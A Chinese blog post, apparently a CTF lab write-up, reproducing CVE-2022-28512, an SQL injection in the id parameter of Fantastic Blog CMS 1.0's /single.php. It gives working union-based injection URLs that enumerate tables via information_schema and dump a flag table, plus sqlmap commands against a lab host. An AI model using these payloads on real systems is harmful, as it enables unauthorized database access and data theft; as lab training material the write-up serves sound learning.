首页 > 数据库 >【漏洞复现】Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)

【漏洞复现】Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)

时间:2023-03-15 22:35:29浏览次数:39  
标签:Fantastic 2% Blog 漏洞 single SQL php CMS id

Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)


0x01 靶场介绍

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

0x02 影响版本

Fantastic Blog CMS 1.0 版本

0x03 具体步骤

进入靶场,界面如下:

直接访问/single.php?id=1

按流程走,单引号闭合时出现错误回显

/single.php?id=2%27

order by 1页面显示正常,而order by 10时不正常,判断有10列

/single.php?id=2%27order%20by%2010--+

发现回显位2,4

/single.php?id=.2%27union%20select%201,2,3,4,5,6,7,8,9--+

当前数据库库名为ctf

继续查表名

/single.php?id=.2%27union%20select%201,2,3,group_concat(table_name),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+

发现有个表名flag,继续查列

/single.php?id=.2%27union%20select%201,2,3,group_concat(column_name),5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+

继续找flag

/single.php?id=.2%27union%20select%201,2,3,group_concat(flag),5,6,7,8,9%20from%20flag--+

成功找到flag

0x04 使用sqlmap

sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" --dbs

sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf --tables

sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf -T flag --dump

0x05 总结

平平无奇的一场注入,没有任何屏蔽,不需要考虑绕过,典型的SQL注入流程。


标签:Fantastic,2%,Blog,漏洞,single,SQL,php,CMS,id
From: https://www.cnblogs.com/0dot7/p/17220431.html

相关文章

  • MyBlogCSS
    温馨提示:CSS代码较长,将考验浏览器性能,请酌情阅读。点击查看代码a,button{outline:0}.day,.entrylistItem,.entrylistPostSummary,.feedbackCon,.feedbac......
  • 漏洞插件更新源收集
    长亭XRAY:https://github.com/chaitin/xray/releases开源扫描器Nuclei:https://github.com/projectdiscovery/nuclei-templates/国家漏洞信息库:https://www.cnvd.org.cn......
  • CVE-2023-22809 Sudoedit提权漏洞分析
    TRANSLATEwithxEnglishArabicHebrewPolishBulgarianHindiPortugueseCatalanHmongDawRomanianChineseSimplifiedHungarianRussianC......
  • 【漏洞复现】Pharmacy Management System远程代码执行漏洞(CVE-2022-30887)
    PharmacyManagementSystem远程代码执行漏洞(CVE-2022-30887)0x01i春秋靶场介绍多语言药房管理系统(MPMS)是用PHP和MySQL开发的,该软件的主要目的是在药房和客户之......
  • hxp ctf valentine ejs ssti 语法特性造成的漏洞
    拿到源码,是一个node.js写的后端,源码如下:app.js:varexpress=require('express');varbodyParser=require('body-parser')constcrypto=require("crypto");var......
  • 远程代码执行漏洞RCE
    远程代码执行漏洞RCE1、RCERemoteCodeExecute远程代码执行RemoteCommandExecute远程命令执行2、危害窃取服务器的敏感数据、文件对电脑的文件加密,实施勒索......
  • 2022 漏洞分析期末试题详解
    环境准备关闭地址随机化用sudochownroot...和sudochmod4755...为q1~q5设置特权q1题解题面:short类型最大值为65535,input的长度高于该值即可造成整数溢......
  • FastJson 反序列化漏洞原理分析
    Fastjson简介fastjson框架:https://github.com/alibaba/fastjsonfastjson-jndi:https://github.com/earayu/fastjson_jndi_pocfastjson是阿里巴巴开发的java语言编写的......
  • 文件包含漏洞
    b站蜗牛学院课2-P121所用虚拟机地址:192.168.112.188所用本机地址:192.168.112.1Part1文件包含基本知识一、本地文件包含1.源代码在虚拟机的security/fileinc.php......
  • 转载自 https://blog.csdn.net/m0_52165864/article/details/126218082
    Linux系列之系统监控命令 目录1、top命令的使用1、系统统计信息2、系统进程信息2、free命令使用:内存3、df命令的使用:磁盘4、ps命令的使用5、crontab命令6、查看端口的......